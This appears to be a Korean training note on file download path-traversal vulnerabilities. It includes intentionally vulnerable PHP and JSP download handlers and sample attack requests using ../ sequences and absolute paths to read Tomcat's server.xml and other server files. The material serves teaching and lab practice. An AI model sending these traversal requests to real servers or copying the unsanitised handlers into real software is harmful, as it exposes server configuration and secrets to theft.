파일 업로드 취약점

파일 다운로드 취약점 이란 ?

정상적인 파일 다운로드가 아닌 비정상적인 파일을 다운로드하여 공격

 

정상적인 파일 vs 비 정상적인 파일

[경로] 차이가 있다.

정상적인 경로에서 다운로드가 아닌 지정된 경로를 벗어나 상위 디렉터리로 이동하여

서버의 동작, 코드, 설정 등의 파일을 조회하거나 다운 받는 행위

 

C:\Users\kitri\Downloads

현재 경로를 기준으로 C드라이브의 Users 디렉터리로 가고싶다

cd ../../

cd C:\Users

 

파일 다운로드 취약점을 할 때 경로를 이동하는 방법

1. 경로 이동 문자 삽입 (../)

2. 경로 문자 사용 ( 절대 경로 )

 

htdocs ( 홈 디렉터리 )

- CSS

- JS

-Upload

-Download

 

파일 다운로드 기능

download.jsp

downloadAction.jsp

downAction.jsp

 

sadfsdafl.co.kr/download.jsp?file=파일명

파일명의 경우 사용자 입력값이다

대부분의 취약점은 사용자 입력값을 받는데서 출발한다.

왜? 동적 서비스를 제공하기 위해 어쩔 수 없이 입력 값을 받아야 한다

웹 사이트 기능에는 다운로드 기능이 1개 이상 되어 있으며

사용자 입력값을 받으면 지정된 경로에서 지정된 파일을 사용자에게 준다

 

파일 다운로드 기능

반드시 필요한 준비물

웹 디렉터리가 반드시 존재해야하며, 파일 다운로드 기능을 하는 페이지 필요

웹 브라우저에서 지원되는 파일 타입이 늘어남에 따라 URL 접근 시 필요

파일 업로드를 하면 -> 업로드 폴더가 아닐 경우 파일 다운로드 기능을 찾아 볼 필요가 있다 

리눅스가 파일 다운로드 취약점에 조금 더 취약하다

윈도우는 파티션이 다 나뉘어져 있으므로 다른 드라이브로 변경 불가함

 

파일 다운로드 로직

../../../를 많이 하면 무조건 최상위 폴더인 C에 도달하게 되므로 그 뒤에 내가 원하는 폴더 쓰면됨

C드라이브 download_vuln 폴더에서 password.txt 파일 읽기

D드라이브 download_vuln 폴더에서 password.txt 파일 읽기

- 직접적인 방식

www.kitri.re.kr/kitri/file/download.web?dir=/uploadfile/&filename=kitri_logo_Ko_En.jpg&siteDib=kitri

 

- 간접적인 방식

데ㅣ터 베이스를 활용하여 파일 다운로드

www.kitri.re.kr/dowload.web?idx=1  

# index.php
<?php
    header("Content-type : text/html; charset=UTF-8");
?>
<li>첨부파일 : <a href="./download.php?filename=test.jpg">[다운로드]</a>

# download.php
<?php
    $filename = $_GET["filename"];
    $filepath = "upload/{$filename}";

    header("Content-Type: application/octet.stream");
    header("Conetnt-Dispositionl: attachement; filename={$filename}");

    readfile($filepath);
?>

다운로드 한 사진 오픈 하면 뜨는 사진

 

 

Original Filename & Real Filename

<%@ page contentType="text/html; charset=UTF-8" %>
<li>다운로드1 : <a href="download1.jsp?org_filename=test.jpg&real_filename=abcd.jpg">[다운로드1]</a></li>
<li>다운로드2 : <a href="download2.jsp?path=image&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드2]</a></li>
<li>다운로드3 : <a href="download3.jsp?path=C:/apache-tomcat-8.5.81/webapps/ROOT/upload/image/&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드3]</a></li>

# download.php
<?php
    $org_filename = $_GET["org_filename"];
    $real_filename = $_GET["real_filename"];
    $filepath = "upload/{$org_filename}";

    header("Content-Type: application/octet.stream");
    header("Conetnt-Dispositionl: attachment; filename={$real_filename}");

    readfile($filepath);
?>

# jsp original filename , real filename
# original filename = 다운 받을 때 뜨는 파일 이름
# real filename = 원래 원본 파일 이름

<%@ page contentType="text/html; charset=UTF-8" %>
<li>다운로드1 : <a href="download1.jsp?org_filename=test.jpg&real_filename=abcd.jpg">[다운로드1]</a></li>
<li>다운로드2 : <a href="download2.jsp?path=image&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드2]</a></li>
<li>다운로드3 : <a href="download3.jsp?path=C:\apache-tomcat-8.5.81\webapps\ROOT\upload\image&org_filename=test.jpg&real_filename=abcd.jpg">[다운로드3]</a></li>

 

# original filename과 real filename으로
# download1.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
    FileInputStream fis = null;			// byte 형태로 파일 복사(input) & 붙여넣기(output)
    BufferedInputStream bis = null;		// buffer에 저장시켜서 1 byte 씩 사용 가져오기
    BufferedOutputStream bos = null;	// buffer에 저장시켜서 1 byte 씩 사용 보내기
    
    String path ="C:\\apache-tomcat-8.5.81\\webapps\\ROOT\\upload\\image\\";
    String org_filename = request.getParameter("org_filename");
    String real_filename = request.getParameter("real_filename");
    if(org_filename == null || real_filename == null){
        out.println("<script>alert('파일명이 입력되지 않았습니다.');histroy.back(-1);</script>");
        return;
    }

    try{
        File fd = new File(path + real_filename);	// real_filename과 주소를 fd에 저장
        if(!fd.exists()){
            out.println("<script>alert('파일이 존재하지 않습니다.');history.back(-1);</script>");
        }
        response.setHeader("Content-Type", "application/octect-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);

        fis = new FileInputStream(fd);
        bis = new BufferedInputStream(fis);
        bos = new BufferedOutputStream(response.getOutputStream());

        byte[] buffer = new byte[1024];
        int i = 0;

        while((i=(bis.read(buffer))) != -1){	// buffer가 텅 빌때까지 반복
            bos.write(buffer,0,i);
        }
        bos.flush();

    }finally{
        if(fis != null) fis.close();
        if(bis != null) bis.close();
        if(bos != null) bos.close();
    }
%>

# file path가 일부만 노출
# download2.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
    FileInputStream fis = null;
    BufferedInputStream bis = null;
    BufferedOutputStream bos = null;

    String path_temp = request.getParameter("path");
    String org_filename = request.getParameter("org_filename");
    String real_filename = request.getParameter("real_filename");
    String path ="C:\\apache-tomcat-8.5.81\\webapps\\ROOT\\upload\\" + path_temp + "\\";

    if(org_filename == null || real_filename == null){
        out.println("<script>alert('파일명이 입력되지 않았습니다.');histroy.back(-1);</script>");
        return;
    }

    try{
        File fd = new File(path + real_filename);
        if(!fd.exists()){
            out.println("<script>alert('파일이 존재하지 않습니다.');history.back(-1);</script>");
        }
        response.setHeader("Content-Type", "application/octect-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);

        fis = new FileInputStream(fd);
        bis = new BufferedInputStream(fis);
        bos = new BufferedOutputStream(response.getOutputStream());

        byte[] buffer = new byte[1024];
        int i = 0;

        while((i=(bis.read(buffer))) != -1){
            bos.write(buffer,0,i);
        }
        bos.flush();

    }finally{
        if(fis != null) fis.close();
        if(bis != null) bis.close();
        if(bos != null) bos.close();
    }
%>

# 모든 file path가 노출
# download3.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
    FileInputStream fis = null;
    BufferedInputStream bis = null;
    BufferedOutputStream bos = null;

    String path = request.getParameter("path");
    String org_filename = request.getParameter("org_filename");
    String real_filename = request.getParameter("real_filename");

    if(org_filename == null || real_filename == null){
        out.println("<script>alert('파일명이 입력되지 않았습니다.');histroy.back(-1);</script>");
        return;
    }

    try{
        File fd = new File(path + real_filename);
        if(!fd.exists()){
            out.println("<script>alert('파일이 존재하지 않습니다.');history.back(-1);</script>");
        }
        response.setHeader("Content-Type", "application/octect-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);

        fis = new FileInputStream(fd);
        bis = new BufferedInputStream(fis);
        bos = new BufferedOutputStream(response.getOutputStream());

        byte[] buffer = new byte[1024];
        int i = 0;

        while((i=(bis.read(buffer))) != -1){
            bos.write(buffer,0,i);
        }
        bos.flush();

    }finally{
        if(fis != null) fis.close();
        if(bis != null) bis.close();
        if(bos != null) bos.close();
    }
%>

1. 파일 이름만 노출 2. 파일 경로 일부 노출 3. 파일 경로 노출

burp에서 path와 real_filename 변경을 통해 notepad.exe 파일 탈취

탈취 성공

Original Filename : 내가 다운 받거나 업로드 할 때 파일 이름

Real Filename : 웹 서버에 저장되어 있는 파일 이름

 

공격 방법

CASE 1 사용자로 입력받는것이 파일명만 존재할 때

정상 요청 : /download1.jsp?filename=abcd.jpg

공격 요청 : /download1.jsp?filename=../../../../conf/server.xml

 

CASE 2 사용자로 입력 받는 것이 일부 경로와 파일명만 존재할 때

정상 요청 : /download2.jsp?path=image&filename=abcd.jpg

공격 요청1 : /download2.jsp?path=../../../conf&filename=server.xml

공격 요청2 : /download2.jsp?path=../../../conf/server.xml&filename=

공격 요청3 : /download2.jsp?path=image&filename=../../../../conf/server.xml

 

CASE 3 사용자로 입력받는 것이 절대 경로일 때

정상 요청 : /download3.jsp?path=C:/apache-tomcat-8.5.81/webapps/ROOT/upload/image/&org_filename=test.jpg&real_filename=abcd.jpg

공격 요청1 : /download3.jsp?path=C:/apache-tomcat-8.5.81/conf/&org_filename=test.xml&real_filename=server.xml

linux

cd /etc/networks (o)

cd \etc\networks (x)

 

windows

cd C:\windows\system32 (o)

cd C:/windows/system32 (o)